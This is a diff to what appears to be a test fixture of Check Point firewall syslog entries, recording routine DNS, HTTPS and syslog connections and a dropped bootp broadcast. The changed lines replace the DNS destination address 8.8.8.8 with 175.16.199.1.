 <134>1 2020-03-29T17:58:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e1c8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60218"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:58:32Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e1c8,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35594"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10150"; xlatesrc:"0.0.0.0"]
@@ -3472,68 +3472,68 @@
 <134>1 2020-03-29T18:01:25Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e277,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T18:01:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e277,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:01:28Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e278,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36943"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34432"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38554"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58518"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54993"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36943"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34432"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38554"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58518"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44896"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35443"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35443"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53256"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52753"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34408"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29d,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504925"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52753"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34408"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38664"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48061"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48061"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.169"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51666"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49360"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53810"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49853"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
